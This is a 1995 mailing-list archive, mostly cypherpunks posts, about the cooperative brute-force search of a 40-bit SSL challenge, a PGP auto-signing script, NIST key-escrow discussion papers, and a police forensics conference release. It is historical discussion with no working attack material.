X-Loop: rre@weber.ucsd.edu
Precedence: list
Resent-Sender: rre-request@weber.ucsd.edu

Date: Thu, 24 Aug 1995 01:39:07 -0700 (PDT)
From: Michael Papadopoulos <papadop@PEAK.ORG>
Subject: Proper Methods for Seizing Computers from Criminals

[ This is the ASCII transcript of a News Release. I have not transcribed 
additional informative paragraphs which describe the IACIS and the more 
than 150 different law anforcement agencies which have sent their "best 
computer specialists to our training conferences ... since 1991. ]

***************************************************************
P.P.B CHIEF'S OFFICE  TEL: 503-823-0342       Aug. 18, 95  16.15  
..............

City of Portland, Oregon, Bureau of Police
Vera Katz, Mayor,
Charles A. Moose, Chief of Police
1111 SW 2nd Ave..
Portland Oregon 97204

Lieutenant C.W. Jensen
Public Information  Officer
phone: 503 -823-0010
Digital Pager : 790-1779	      

August 18, 1995

NEWS RELEASE

CHIEF MOOSE TO OPEN 6TH ANNUAL  IACIS TRAINING CONFERENCE

	Chief Charles Moose will deliver the opening remarks at the 6th 
Annual IACIS Training Conference at the Hilton Hotel  in Portland on 
Monday, August 21, 1995 at 10,00 a.m. IACIS is the acronym for the 
International Association of Computer Investigative Specialists, 
headquartered here in Oregon.
	IACIS was founded by Sgt. Tom Seipert of the Portland Police 
Bureau, and specializes in training law enforcement officers in the 
proper methods of seizing computers from criminals, and then extracting 
items of evidence. Computers are the crime scenes of the future, and 
require special training to seize and examine.  The conference will begin 
with a series of mock computer raids on August 21, 1995, and end on 
September 1, 1995, with information on the latest technological changes 
the investigators need to worry about.
	Approximately 150 students will be attending the conference, some 
from as far away as Australia, and the major agencies such as the FBI, 
DEA, Secret Service, IRS Internal Security, and the Georgia Bureau of 
Investigation will be represented.
	For additional information about this conference, and questions 
regarding computer crime investigations, contact Sgt. Tom Seipert at the 
Hilton hotel, 274-4087. He will be at this number Friday August 18th as 
well as Saturday and Sunday, August 19th and 20th.

*********************************************************************




---
Concurrent VLSI Arch. Group     545 Technology Sq., Rm. 610
MIT AI Lab                      Cambridge, MA 02139 (617)-253-0972




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: patrick@Verity.COM (Patrick Horgan)
Date: Fri, 25 Aug 95 10:31:46 PDT
To: Piete.Brooks@cl.cam.ac.uk
Subject: Re: Cypherpunk Brute Squad [Re: SSL Challenge: Server problems]
Message-ID: <9508251723.AA18139@cantina.verity.com>
MIME-Version: 1.0
Content-Type: text/plain


> current requirements
> ====================
> 
> PLEASE ensure that you are using a brclient of at least 0.14
> ("grep comment.inffo brclient" to discover what you are using)
> You can updare brclient while brloop is running.
> Some people are still running old versions, and this is hammering the server.
> 
> It also helps to run at least brloop 0.05 ("grep BRLOOPCOMMENT brloop").
> 

Unfortunately the web page under "Socket based key doler" points 
at brclient 0.13 and brloop 0.04.  Could you fix this please:)

Thanks,

Patrick
   _______________________________________________________________________
  /  These opinions are mine, and not Verity's (except by coincidence;).  \
 |                                                       (\                |
 |  Patrick J. Horgan         Verity Inc.                 \\    Have       |
 |  patrick@verity.com        1550 Plymouth Street         \\  _ Sword     | 
 |  Phone : (415)960-7600     Mountain View                 \\/    Will    | 
 |  FAX   : (415)960-7750     California 94303             _/\\     Travel | 
  \___________________________________________________________\)__________/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei@process.com>
Date: Fri, 25 Aug 95 07:24:04 PDT
To: cypherpunks@toad.com
Subject: SSL Challenge: Are we in trouble?
Message-ID: <9508251423.AA15417@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Well, the server appears to be unable to serve cgi scripts - I get 
'500 - server error' whenever I try. I cannot report the ~500 segments
I swept overnight, nor get new keyspace.

I thing it's gotten to the point where the server is the bottleneck on 
this operation - we seem to have plenty of cpu for sweeps. This will
damage our primary goal - to demonstrate how fast 40 bits can be
swept.

Piete, Adam, could you put a note on the /bute/ root page describing the
server status?

Thanks





 

Peter Trei
Senior Software Engineer
Purveyor Development Team                                
Process Software Corporation
trei@process.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce Wilcox <wilcoxb@nag.cs.colorado.edu>
Date: Fri, 25 Aug 95 10:20:09 PDT
To: "Henry W. Farkas" <hfarkas@ims.advantis.com>
Subject: Re: Auto-pgp for pine/elm/tin
In-Reply-To: <Pine.A32.3.91.950825120224.63029A-100000@pangloss.ims.advantis.com>
Message-ID: <199508251719.LAA06763@nag.cs.colorado.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

My thanks to Henry for a glowing recommendation of my product.  Just a few
clarifications:


Henry W. Farkas <hfarkas@ims.advantis.com> wrote:

> Yes, it exists, and I'm using it now.  I've tried competing products and 
> found this to be the cleanest, smoothest and easiest to install.  I have 
> no personal, commercial or financial interest in this product.   It does 
> "auto-pgp" for pine, elm and tin.  


"Bryce's Auto-PGP", or "BAP", is an sh script, so it can be integrated with
most Unix programs.  Pine, Elm, trn, mh are the only programs that I have
personally run it with.  (Unless you count "finger" and "cat"...)

 
>  ***********************************************************************
>  *  BAP v.1.01                                                         *


The current version is BAP v1.0beta in second beta-test.  I'm pretty much 
just waiting on reports from the second batch of beta-testers and then 
I'll call it 1.0 and send it out to those who requested the first non-beta 
release.


>  *  URL: <http://cs.colorado.edu/~wilcoxb/home.html>                   *


I have no working WWW page at the moment.  When I release bap v1.0 I will
have a page at http://ucsu.colorado.edu/~wilcoxb/bap.html and possibly at
other sites.


> I also found the author responsive to my comments and suggestions.
> Just please do *-NOT-* put your pass phrase in a cleartext file!


BAP gives the user the option of putting her passphrase in a temporary
cleartext file.  This is to help people who can't input the passphrase
manually because their mail program is stingy with stdin.  Putting your
pasphrase in a temporary cleartext file isn't a good idea, but it is usually
a better idea than putting it in an environment variable like PGPPASS.  (Ref:
Derek Atkins "appnote.txt" which comes with PGP 2.6 distributions.)


I'm looking forward to the first general release of BAP.


Bryce

signatures follow:


                                 +                                           
    public key on keyservers     /.       island Life in a chaos sea         
    or via finger 0x617c6db9     /             bryce.wilcox@colorado.edu     
                                 ---*                                     

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed with Bryce's Auto-PGP v1.0beta

iQCVAwUBMD4GKPWZSllhfG25AQG0eAQAqL0+24+RHdeV6Vb4pxz8ieoD2MuAOXNb
hb+cFh3jmokqpIFdnJbPGxbZKIUesbJkh8JkQKRW0iKbTA4UsnAVtD2qksG1qSdH
ebC5G77StWlgLZ8E62KOYIruCcj/uXE0oKchEyqvcqIb82TKdwp/2C7Hn2NcCbbN
TYKDM6XtsPY=
=eZbY
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Fri, 25 Aug 95 08:22:01 PDT
To: trei@process.com
Subject: Re: SSL Challenge: some thoughts on the process.
Message-ID: <199508251521.LAA17497@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:24 PM 8/24/95 -6, Peter Trei wrote:

>3. Start time was a little ragged - 1800 GMT was named, but the server 
>seemed to come up at 2PM east coast time, which is (I think) 1900 GMT. I 
>think that if we selected 8AM west coast time (1600 GMT?) more people 
>would come online more quickly.

1400 EDT=1800 GMT.  This is because GMT=\BST.  GMT always stays the same and
does not become British Summer Time (or whatever it is Brussels is making
the UK call its time zone these days).

Another general problem though is that Monday is August Bank Holiday in the
UK.  That might further delay UK office-based result reporting.  Start
day-of-the-week should be something like Tuesday.

DCF

"When one has a peer-to-peer network, it means that 'all Nodes are created
equal, that they are endowed by their Creator with certain unalienable
Rights, that among these are Life, Liberty, and the Pursuit of Happiness'."







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 25 Aug 95 08:26:53 PDT
To: cypherpunks@toad.com
Subject: KGB_laf
Message-ID: <199508251526.LAA09545@pipe2.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   8-25-95. NYPaper:


   "C.I.A. Still in Dark on Spy's Damage."

      Eighteen months after the arrest of Aldrich H. Ames,
      Moscow's mole inside the Central Intelligence Agency,
      the agency has still not sounded the depths of the
      damage he did. The process of looking backward to
      reconstruct the past and understand the present -- the
      business of "walking back the cat," in espionage argot
      -- has proved immensely frustrating. Often he did not
      know the true names or roles of the people he betrayed.
      The Soviet (and later the Russian) intelligence services
      forced some of the men Mr. Ames betrayed to become pawns
      in a game of deception, using them to feed false
      information on some of those operations to the C.I.A. in
      an effort to mislead and mystify the agency. The C.I.A.
      became a laughing stock for the way in which it
      investigated itself once it knew its Soviet agents had
      been betrayed.


   8-25-95. W$Japer:


   "Russia's Threat Beneath the Surface."

      Most elements of Russias's military arsenal are
      shrinking in numbers and effectiveness. Yet Russia is
      still completing construction of submarines begun in the
      Soviet era, on about the same timetable as the Soviets
      produced them. Recently, it laid the keel for an even
      more advanced submarine and will enter the next century
      with the largest nuclear submarine fleet in the world.
      That new Russian subs are so quiet is attributable in
      part to the skill of Russian scientists and engineers,
      in part to Western technology illicitly acquired, and in
      part to help from two convicted American spies, John
      Walker and Jerry Whitworth, who for many years sold U.S.
      secrets to the Soviet Union.


   Pair of Karlas: KGB_laf (14kb)












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: danisch@ira.uka.de (Hadmut Danisch)
Date: Fri, 25 Aug 95 02:43:12 PDT
To: cypherpunks@toad.com
Subject: Re: Article in Time Magazine
Message-ID: <9508250941.AA00683@elysion.iaks.ira.uka.de>
MIME-Version: 1.0
Content-Type: text/plain



> All the more reason to use Linux or FreeBSD - an OS you have the source for,
> on hardware that you can examine.


How would you want to examine a pentium processor?

Just an idea:

Take the block move instructions and attach a little state machine.
If a certain sequence of bytes is detected, a fuse somewhere on the chip
is burned and the processor could switch irreversible into a mode where
it does partial incorrect calculations. Send someone an email, an IP packet
or an ethernet packet and you can expect the packet to be moved by a
block move command. 


Hadmut
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <mfroomki@umiami.ir.miami.edu>
Date: Fri, 25 Aug 95 08:51:26 PDT
To: cypherpunks <cypherpunks@toad.com>
Subject: Florida Drivers Permits
Message-ID: <Pine.PMDF.3.91.950825114959.623152053C-100000@umiami.ir.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


Will, starting next year, containg a digitized photo, plus the current 
info.  The Miami Herald reports that the technology could also be used to 
store "other" info, such as medical data, or "could be" used by banks.

Anyone know any details about the technololgy?

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | mfroomki@umiami.ir.miami.edu
U. Miami School of Law     | 
P.O. Box 248087            | It's hot here.  And humid.
Coral Gables, FL 33124 USA |
See (experimentally & erratically) http://viper.law.miami.edu/~mfroomki





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Peter F Cassidy <pcassidy@world.std.com>
Date: Fri, 25 Aug 95 08:56:32 PDT
To: cypherpunks@toad.com
Subject: All about Bernstein
Message-ID: <Pine.3.89.9508251129.A27523-0100000@world.std.com>
MIME-Version: 1.0
Content-Type: text/plain



Folks,

I'm the guy who authored an upcoming piece about Bernstein's law suit 
with the state department for WIRED. WIRED loves the piece but, in the 
style of popular mags, wants more personal stuff on Bernstein, who is 
super articulate about the science and law of crypto but super shy about 
his heroic self. (Guy wouldn't even disclose his age! Had to threaten to 
throw myself in front of a bus to get him to tell me he's from Long 
Island!) Editor thinks guy comes across as a ghost, not surpisingly. . .

One fellow from the list, following up an appeal I made here for Friends
of Bernstein to call me and tell me about the litigant's best qualities,
I'd appreciate greatly hearing from again. He called when I'd pretty much 
passed deadline for manuscript delivery. I'm calling Dan again, but after 
one trip to Delphi, I dunno if the responses from the Oracle will be any 
more forthcoming.

Thanks and regards to all,

Peter Cassidy






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Henry W. Farkas" <hfarkas@ims.advantis.com>
Date: Fri, 25 Aug 95 09:04:24 PDT
To: cypherpunks@toad.com
Subject: Auto-pgp for pine/elm/tin
Message-ID: <Pine.A32.3.91.950825120224.63029A-100000@pangloss.ims.advantis.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

> Does anyone know of an addon to the Pine mailer that supports PGP? 
> the only PGP software i could find required me to first compose a
> letter in an editor then run it through a pgp signature program
> then finally read it into my favorite mailer.
> 
> I'm looking for something that is hopefully transparent, or if not
> relatively quick to do.
> ________________________________________________________________________
> Sameer Manek                Seawolf@challenger.atc.fhda.edu         
> ________________________________________________________________________

- ------------------------------------------------------------------------

Yes, it exists, and I'm using it now.  I've tried competing products and 
found this to be the cleanest, smoothest and easiest to install.  I have 
no personal, commercial or financial interest in this product.   It does 
"auto-pgp" for pine, elm and tin.  

 ***********************************************************************
 *  BAP v.1.01                                                         *
 *  Written August 1995 by Bryce Wilcox                                * 
 *  e-mail: <bryce.wilcox@colorado.edu>                                *
 *  PGP key id: <617C6DB9>                                             *
 *  snail mail: <2228 Canyon Blvd, Apt. 1E, Boulder, CO, 80302>        *
 *  URL: <http://cs.colorado.edu/~wilcoxb/home.html>                   *
 *  BETA TEST VERSION!  DO NOT DISTRIBUTE!                             *
 * (Note that documentation, among other things, is still unfinished.) *
 ***********************************************************************

I also found the author responsive to my comments and suggestions.
Just please do *-NOT-* put your pass phrase in a cleartext file!

- ------------------------------------------------------------------------

===========================================================================
     Henry W. Farkas      |      Me?    Speak for IBM?    Fat chance.
 hfarkas@ims.advantis.com |------------------------------------------------  
   hfarkas@vnet.ibm.com   |     http://newstand.ims.advantis.com/henry
      henry@nhcc.com      |          http://www.nhcc.com/~henry 
- ---------------------------------------------------------------------------
PGP 6.2.2 Key fingerprint: AA D0 F5 44 C1 8C 11 52  B3 80 34 1C CE 38 EC 53
 Public key at: pgp-public-keys@pgp.mit.edu, and other popular key servers.
- ---------------------------------------------------------------------------
Brought to you by Henry's Hardware: Home of the Pretty Good Hack "We're not
  fast, but it's not bad, and we're cheaper than the guy down the street!"
===========================================================================



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed with Bryce's Auto-PGP v1.0beta

iQCVAwUBMD30WaDthkLkvrK9AQF6sQP/fVen7ZI4DbgC14y+NPdZYOjaRQ9/jQNT
d4StD638OoBRkO7b8efiTd/rNULwuzSPKDiplKwRdE8Bboh4FdSWYvz6wfqgNJcd
D3imouQcEt+erjEC2H5haQyZwBHeNNR9mTYhkzoBt4+jMqsRCECduaExyHUOTWFj
euOkRqTJ0l4=
=2q74
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Piete Brooks <Piete.Brooks@cl.cam.ac.uk>
Date: Fri, 25 Aug 95 04:11:59 PDT
To: jim@acm.org
Subject: Re: Cypherpunk Brute Squad [Re: SSL Challenge: Server problems]
In-Reply-To: <199508250059.RAA02668@mycroft.rand.org>
Message-ID: <"swan.cl.cam.:226410:950825111043"@cl.cam.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


**** Anyone participating in the SSL Challenge who has logs of their searches
**** please ensure you read "What to do if you have logs" below

** Anyone who is running a brclient earlier than 0.14 or a brloop earlier
** than 0.05 please ensure you read "current requirements"

> Live and/or learn

The purpose of this project was the latetr ...

> -- looks like the performance is a little better now that they're handing out
> bigger chunks.

That is just one of the tweaks I made ...

> The important thing is to learn something new each time so the next one goes
> more smoothly.

Indeed -- the current project is a merge of three I had planned ...

> Should be nicer with hierarchical servers and so on for the next challenge...
> DES or lobotomized DES or whatever.

Yeah .... :-)



This project arose from the "failed" rc4-40 attempt.
Personally I think it worked -- it showed that it was possible to scan a 40 
bit address space performing the kind of manipulations needed for brute force 
attacks.

The WWW interface was a pain as it required users to do something, so the norm 
was to allocate large chunks, etc.
Also collating the results was a nightmare !

So we decided that cutting the people out would be a good idea all round.
We bolted it all together, and it seemed kind of OK.
The plan was then to pass it round a wider audience to check that it ported to 
other systems and environments, and once it was shown to bsasically work, see 
how it stood up to heavy usage. Finally we could let it rip & see what it 
could do.
Unfortunately, due to various external pressures, we have ended up rolling all 
these three into one. It has made it a lot messier than I would have hoped, 
for which I apologise to you all.

rc4-40 had shown that 40bit address spaces could be scanned.
hal1 slipped through our fingers, and showed somewhat more than we had 
planned, i.e. that actual code could be broken by a *single* person (this 
sounds more impressive, but is technically easier !).
We asked for hal2 and hal3 to "check it works" and "watch it zip" repectively.
Before he left, Hal gave us hal2, so we combined the two remaining stages.

SO: this project is:
    1) to shake down the code on different systems
    2) to see how it works under real load
    3) to see how quickly a 40bit address space can be scanned.

Again I apologise to you all that (1) has been non-trivial and that (2) has 
had unpleasant effects of (1). I think next time we may be ready for (3) ...

I was going to summarise some of the lessons so far, but things are getting 
congested again, so I shall send out this PLEA to ensure recent code is used !!

current requirements
====================

PLEASE ensure that you are using a brclient of at least 0.14
("grep comment.inffo brclient" to discover what you are using)
You can updare brclient while brloop is running.
Some people are still running old versions, and this is hammering the server.

It also helps to run at least brloop 0.05 ("grep BRLOOPCOMMENT brloop").

What to do if you have logs
===========================

During the early part of the project, the server was highly congested, and I 
fear that many ACKs may have been lost :-(

If you have logs of the searches your machine(s) did, it would be useful to 
check  that all ACKs got through.

Look at the stats page http://www.brute.cl.cam.ac.uk/cgi-bin/brute?op=stats
(or something like
http://www.brute.cl.cam.ac.uk/cgi-bin/brute?op=stats&project=&proj=2977+Hal%27s
+second+challenge&substring=YourID&patt=unacknowledged
but with YourID repleaced by the ID ypou use)
and look for all the NOACKs. e.g:
	008f      NOACK 008f   1 Piete Brooks <pb@cl.cam.ac.uk>
See if there is a corresponding entry in your logs
	grep -h '2977 [0-9a-f]* 008f [0-9]* [n0-9a-f][o0-9a-f]'
and if so, ACK it
	brclient -Ltssl -a'2977 2a07 008f 1 no'

[ If your a HACKer, you can automate it, as in

	lynx -dump 'http://www.brute.cl.cam.ac.uk/cgi-bin/brute?op=stats&project=&proj
=2977+Hal%27s+second+challenge&substring=Piete.Brooks&patt=unacknowledged' |
	grep ' NOACK ' | while read a b; do
	   grep -h '2977 [0-9a-f]* '$a' [0-9]* [n0-9a-f][o0-9a-f]' ~/BR-*;
	   done | while read a; do brclient -Ltssl -a"$a"; done

  of the like ....
]




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Christian Wettergren <cwe@Csli.Stanford.EDU>
Date: Fri, 25 Aug 95 12:19:29 PDT
To: patrick@Verity.COM (Patrick Horgan)
Subject: Re: Cypherpunk Brute Squad [Re: SSL Challenge: Server problems]
In-Reply-To: <9508251723.AA18139@cantina.verity.com>
Message-ID: <199508251916.MAA26736@Csli.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain



| > those who have logs
| > ===================

    [about manually updating ACKs]

Unfortunately, I don't dare do that, since my machines has crashed
a few times. (nightly reboots for example.)

I guess you dare do it if there is a no-line in the log.

Couldn't you insert some code that measures the time it has taken
that particular IP-number to ACK other block, and timeout the
reservation after double that time or something similar? In this case
you don't run the risk of ACKing a block with the key in it.

Some more work for the server! :-)

/Christian





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Piete Brooks <Piete.Brooks@cl.cam.ac.uk>
Date: Fri, 25 Aug 95 05:04:35 PDT
To: fc@all.net (Dr. Frederick B. Cohen)
Subject: Re: improving the distributed computation
In-Reply-To: <9508251143.AA15702@all.net>
Message-ID: <"swan.cl.cam.:252910:950825120349"@cl.cam.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


> 1) Abandon the central command way of doing things.  Little if any
> communication is required for this computation, it should be
> self-distributing to and between volenteer sites.  That makes it ideal
> for implementation as a safe virus. 

I need some hints as to what the above means, but combined with (3) it becomes 
trivial ...

> 2) Give these computations a defined and limited lifetime.  The problem
> you have with old versions is because they don't die automatically or
> even check to see if they are up-to-date and update themselves.

You want self updating code running on *your* system ???

What do you mean by "safe virus" ??

> 3) Use randomness to break up the search space and redundantly perform
> the computation.  This should eliminate the problems with malicious
> key-space requests, etc.

If you take this step, you can chuck SKSP altogether.
All that is needed is some way to tell the virus to stop when teh answer has 
been found -- or would you not bother with that ?

If random searching were permitted, that would indeed be the way to go.

> 4) Use feedback in the form of selective survival/replication to
> optimize the search and allocate search space.  If a processor goes
> quickly, give it more to do - if it goes slowly, give it less.

I'm lost -- if thee search is random, you kusst let it run !

> This will produce an overall system that adapts with time to the cahges in
> network and system usage so as to optimize overall performance as a
> function of time.

Eh ?

With random searching you just run it on all machines you can !
No adaptation, jusst brute CPU cycles ....


Have I missed something ??




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: liberty@gate.net (Jim Ray)
Date: Fri, 25 Aug 95 10:15:45 PDT
To: cypherpunks@toad.com
Subject: Re: Florida Drivers Permits
Message-ID: <199508251710.NAA26505@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----

[Welcome back, Professor] You posted:


>Will, starting next year, containg a digitized photo, plus the current 
>info.

<snip>

>Anyone know any details about the technololgy?

<snip>

Not really.
        I saw the same story. The name, address, age, & height mentioned
are already obvious on licenses, but this may preclude incorrect data entry
by FL cops, and counterfeiting (a problem here for *years*). I saw nothing
on the digitized photo, but we could be looking at different stories.
Phase-in in July, '96. The story I saw suggests that other data, such as
tickets, criminal violations (presumably convictions) and "other
biographical information" [welfare, credit info] could eventually be
included, depending on FL's state budgetary considerations. No author,
just "Associated Press," listed on the story, and the card uses a magnetic
strip "like those on credit cards" rather than a chip, which may be a
mistake [considering the renewal period & my experience with bank-cards].
Story doesn't say it, but it sounds like FL *may* be the first state to do
this. Are any other states doing this already?
JMR


- -----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Freedom isn't Freeh

iQCVAwUBMD4DiW1lp8bpvW01AQGF+QP/RG9aTxVeujNDL2ebdyNL558PrtXclUhf
9iLETvzNu/OtplKZXng67SkBkECpbh5LyOpoeRkhhWUANJhcIUhJKhcaUIOmLR2n
KLjQ6WnGx5OHXPr53htVrvyg4L6Y0tX5233AEk8iDxxBh79alHmxuklT7s13CPgI
k9HklCZ77kg=
=teIz
- -----END PGP SIGNATURE-----
Regards, Jim Ray

"Those who deny freedom to others deserve it not for themselves, and,
under a just God, cannot long retain it." -- Abraham Lincoln,
in a letter to H.L. Pierce, 6-Apr.-1859
- ------------------------------------------------------------------------
PGP key Fingerprint  51 5D A2 C3 92 2C 56 BE  53 2D 9C A1 B3 50 C9 C8 
Key id. #  E9BD6D35  James M. Ray  liberty@gate.net
- ------------------------------------------------------------------------
Support the Phil Zimmermann (Author of PGP) Legal Defense Fund! 
email:  zldf@clark.net or visit http://www.netresponse.com/zldf
________________________________________________________________________

- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMD4D+SoZzwIn1bdtAQGy+gGAq40gk8nqgdvnSrp6QBQ3jcW5f8kI0wux
IoWUKN8tHUaOHuP+s4ImuW6j++Mhht1b
=zXwD
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Fri, 25 Aug 95 10:20:32 PDT
To: cypherpunks@toad.com
Subject: Search This Space Please
Message-ID: <199508251720.NAA08690@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


When one leaves ones machine running all night with the screen turned off,
one should be careful to turn the sceen on *before* hitting the power
switch.  Since hitting an on button switch will turn it off before you
collect the search results.

I have tried to REJECT this range but haven't been able to figure out the
syntax the server expects.  I am without fast machines for the weekend.

Here it is:

**************************************

brutessl ssl.pf 2977 0198   20
assuming the config info is in ssl.pf

so go do it !

**************************************

Thanks,
 
DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lou Poppler <lwp@mail.msen.com>
Date: Fri, 25 Aug 95 10:31:13 PDT
To: cypherpunks@toad.com
Subject: for perl experts: brclient problem
Message-ID: <Pine.BSD/.3.91.950825132719.4736B-100000@conch.aa.msen.com>
MIME-Version: 1.0
Content-Type: text/plain


I sent this originally only to Piete, but as I suspect he is already 
somewhat busy, I am now also forwarding a copy to the list.

I just upgraded to brclient version 0.16.
I tried to use it with this command:
brclient -Ltssl -a'2977 6284 390a 3 no'
I got this result:
Use of uninitialized variable at ./brclient line 457, <COMMAND> line 1.
Failed: 0 <No DATA>

I am totally perl.clueless, so I merely refer this to you.

::::::::::::::::::::::::::::::::::::::
:: Lou Poppler  <lwp@mail.msen.com> ::   No animals were harmed in the
::      http://www.msen.com/~lwp/   ::   production of this message.
::::::::::::::::::::::::::::::::::::::





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@rand.org>
Date: Fri, 25 Aug 95 13:36:10 PDT
To: cypherpunks@toad.com
Subject: Approved Escrow Agents (forget GAK Motel)
Message-ID: <199508252035.NAA05527@mycroft.rand.org>
MIME-Version: 1.0
Content-Type: text/plain


Here are some discussion papers for the upcoming NIST-sponsored conference
on 6-7 Sep 95 in DC.  Note the footnote in the 2nd paper:

    (*1)  "Approved," for the purposes of this discussion, means that
    the government (or its agent) has formally granted permission for
    an organization to hold keys for exportable encryption products.

I'd been working on some GAK slogans based on Roach Motel... into the
dumpster with "Keys go in, but they never come out!" -- too bad.

	Jim "GAK Motel" Gillogly
	Sterday, 3 Halimath S.R. 1995, 20:32
___________________________________________________________________________

Key Escrow Issues Meeting, September 6-7, 1995
Discussion Paper #1


                      Issues -- Export of 
                 Software Key Escrowed Encryption


On August 17, 1995, the Administration announced its proposal to
permit the ready export of software encryption provided that the
products use algorithms with key space that does not exceed 64
bits and the key(s) required to decrypt messages/files are
escrowed with approved escrow agents.  Under the proposal,
products will be reviewed to verify that they satisfy the
criteria and, if so, they will be transferred to the Commodity
Control List administered by the Department of Commerce where the
products can be exported under a general license (in much the
same way that 40-bit RC2/RC4 encryption is licensed today).  

We are working toward creating broadly stated criteria that are
in the nature of performance specifications.  To meet these
criteria, encryption products will need to implement key escrow
mechanisms that cannot be readily altered or bypassed so as to
defeat the purposes of key escrowing.  

The criteria, when finalized and published, will state the
objectives, but not the exact technical method(s), by which those
objectives are satisfied.  This is to provide software publishers
the flexibility to design methods for meeting our stated
objectives in a manner that is compatible with the design of
their products.  There are, therefore, a number of questions we
must work together to answer in order to draft effective
criteria.  These questions are:  

*    Avoiding multiple encryption -- How can the product be
     designed so as to prevent doubling (or tripling, etc.) the
     key space of the algorithm? 

*    Disabling the key escrow mechanism -- How can products be
     made resistant to alteration that would disable or
     circumvent the key escrow mechanism?  How can the "static
     patch" problem be avoided?  How can this be tested?

*    Access to escrow information -- What mechanisms must be
     designed into encryption products to allow authorized access
     to escrowed keys?  This likely includes the identity of the
     key escrow agent(s) and a serial number for the key escrow
     agent to use to identify the key(s)/component(s) necessary
     to decrypt the message.  What other information will be
     necessary to be provided to the escrow agent to identify the
     necessary key(s)/component(s)?  Are there other comparable
     viable approaches?

*    Non-escrowed use -- How can products be made so that they do
     not function with non-escrowed products (or tampered
     escrowed products)?  How can this be tested?

*    Limiting surveillance -- How can products be designed so
     that information both sent and received by the user can be
     decrypted without release of keys of other users?

*    Practical Key Access -- How can mechanisms be designed so
     that repeated involvement of escrow agents is not required
     for decryption for multiple files/messages during the
     specified access period?

*    Assurance that keys are escrowed -- How can it be assured
     that key escrow products are indeed satisfactorily escrowed? 
     For example, products could be required to be escrowed at
     time of manufacture or be made inoperable until properly
     escrowed.

*    Ability to re-escrow keys -- How can products be designed so
     that new keys can be escrowed at the user's discretion with
     a U.S. Government approved escrow agent?

*    Certified escrow agents -- Can products be designed so that
     only escrow agents certified by the U.S. government
     (domestic, or under suitable arrangements, foreign) are
     utilized?  What should be the criteria for an acceptable
     U.S. escrow agent? 

                         --------------

With your input, we are hopeful that this effort will lead to
definitive criteria, which will facilitate the development of
exportable products and help minimize the time required to obtain
export licenses.  The Administration seeks to finalize such
criteria and make formal conforming modifications to the export
regulations before the end of 1995.  


Note:  These issues will be discussed at the Key Escrow Issues
Meeting to be held September 6-7, 1995 (9:00 a.m. - 5:00 p.m.) at
the National Institute of Standards and Technology (Gaithersburg,
Maryland).  The meeting will be open to the public, although
seating is limited.  Advance registration is requested, please
contact Arlene Carlton on 301/975-3240, fax: 301/948-1784 or e-
mail: carlton@micf.nist.gov.


8/25/94

                  -----------------------------
Key Escrow Issues Meeting, September 6-7, 1995
Discussion Paper #2


                      Discussion Issues:  
         Desirable Characteristics for Key Escrow Agents


In the government's recent announcement of its intent to allow
the export of 64-bit software key escrow encryption products, one
stipulation was that the keys would be escrowed with an approved
key escrow agent.(*1)  Exactly what qualifications/considerations
are appropriate for approval as a key escrow agent have not been
defined.  Some of the issues which need to be discussed and
resolved include the following:

*    What kinds of organizations should be excluded from
     consideration as approved key escrow agents? 

*    What sort of legal agreement between the government and the
     key escrow agent is necessary to stipulate the
     responsibilities of the agent?  Should this include the
     terms and conditions under which release of a key is
     required?  

*    How will liability for unauthorized release of key be
     handled?

*    Should, for example, intentionally misreleasing or
     destroying a key be criminalized?  Should this include other
     actions?                           

*    How can the government's needs for confidentiality of key
     release be handled?

*    Should approval of key escrow agents be tied to a public key
     infrastructure (for digital signatures and other purposes)? 

*    What procedures need to be developed for the storage and
     safeguarding of keys?

*    What are the acceptable performance criteria (e.g., around-
     the-clock availability, accessibility, reliability, etc.)
     for approved key escrow agents?

*    Under what circumstances will key escrow agents in foreign
     countries be approved?

*    What process will be used to approve escrow agents? 
     Costs/who pays?
- - - ---------
